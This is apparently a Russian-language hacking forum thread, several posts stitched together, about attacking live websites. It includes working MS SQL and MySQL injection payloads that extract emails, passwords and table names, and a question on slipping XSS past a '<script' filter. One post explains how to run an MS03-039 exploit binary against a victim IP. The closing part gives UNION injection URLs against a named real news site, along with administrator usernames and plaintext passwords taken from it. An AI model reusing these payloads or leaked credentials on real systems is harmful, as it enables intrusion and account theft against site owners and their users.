Речь о сайте онлайновой РПГ. Тут MS SQL, не имел с ний дела никогда и не нашел ничего внятного, везде практически речь о MySQL.


выглядит так: Выводит страницу которая показывает характеристики персонажа и кол-во уровней до ресета.

Примерно так:

Status On

Name Fate

Class Fairy Elf

Level 1

Resets 0

PK Level Default

Map Devias

Strenght 22

Agility 25

Vitality 10

Energy 15

[code]/reset?char=Fate'[code] выводит ошибку БД соответсвенно,

та же ошибка та же в регестрации в поле e-mail.

дает вывод

Status

Name darkknight

Class Dark Knight

Level 1

Resets 0

PK Level Default

Map Lorencia

Strenght 18

Agility 18

Vitality 15

Energy 30


Вроде все так, но в поле статус отсутствуют данные, а поля Strenght, Agility, Vitality, Energy не соответствуют полю класс, то есть если поле класс у нас Dark Knight, то эти поля не могут иметь такие значения.

Вопрос, инъекция ли это и можно ли извлечь что либо полезное из всего этого? Если можно, то подскажите плз где можно почитать подробно про MS SQL inj.

хелп, подскажите плз, что-то не могу понять опять, подставлял во все столбцы, но что-то ничего не отображается.. ((
пробовал кодировать/декодировать, шифровать.. но вродеж он и без этого должен цифры отображать нормально?
пробовал хексить слово и потом по коду искать, но тоже ни как..
зы И еще на другом сайте пробую просмотреть таблицы, так показывает таблицу
но почему-то не могу к ней подключиться, ошибку пишет

вопрос по скулю:

Цитата:
+and+(select+top+1+isnull(cast([email]+as+nvarchar(4000)),char(32))%2bchar(94)%2bisnull( cast([password]+as+nvarchar(4000)),char(32))+from+[jackson]..[users]+where+email+not+in+(select+top+1+email+from+[jackson]..[users]+where+1=1+order+by+[email])+)%3E0--


тут выводится в ответе email@domain.com^passmy
Возможно ли сделать запрос чтобы выдавало не email@domain.com^passmy
а !!!email@domain.com^passmy!!!
Тоесть надо добавит 0x212121 в начало и конец каждого ответа
это чтоб со страницы корректно спарсит нужно

Скрипт не позволяет использовать значения <script в любом регистре, причём он его не проглатывает, а именно не пропускает эту информацию выдавая ошибку. (поэтому не надо предлогать варианты типа <scri<script>pt>)
Я пробовал <scr<!-- -->ipt>, так он пропускает, но код становится не рабочим (хотя в манах по XSS такой способ рекомендовали), может быть я не так HTML коментарий использую?

Поправка:
Останавливает передачу, если замечено значение <script (вместе с одной ковычкой), без ковычек пропускает спокойно, такое значение script> или </script> тоже спокойно пропускает. На регистр так-же не обращяет внимание.
Очень надеюсь на помощь, и разумный ответ.

туц
[/QUOTE]
Возможно скрипт работает с другой БД.Укажите в запросе имя БД
Имя базы данных:

Код:

-11+union+select+1,2,3,concat_ws(0x3a,table_name,table_schema),5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+29,1+--+

Зы:Может не хватать прав на доступ

Намекните где можно почитать, как заюзать ms03-039 и есть ли он в метасплойте. Ато в мс я его не нашел (3,2), скачал скомпилированую версию, а как заюзать хз. В cmd выдает: usage 1.exe <target_ip>
Что дальше?

В cmd выдает: usage 1.exe <target_ip>
Ну запусти сплойт с параметром "<target_ip>" - это ip адрес жертвы
example:1.exe 192.168.0.1
Зы:Самого сплойта я не видел и насчет МС незнаю

2 Gidz
http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserN ame,11,12,13,14,15,Password,17,18,19,20,21,22,23,2 4+from+tuser+limit+1,1--
administrator:0641
http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserN ame,11,12,13,14,15,Password,17,18,19,20,21,22,23,2 4+from+tuser+limit+2,1--
admin123:admin123

http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserN ame,11,12,13,14,15,Password,17,18,19,20,21,22,23,2 4+from+tuser+limit+3,1--
ann:bkk1854
И так далее и тому подобное...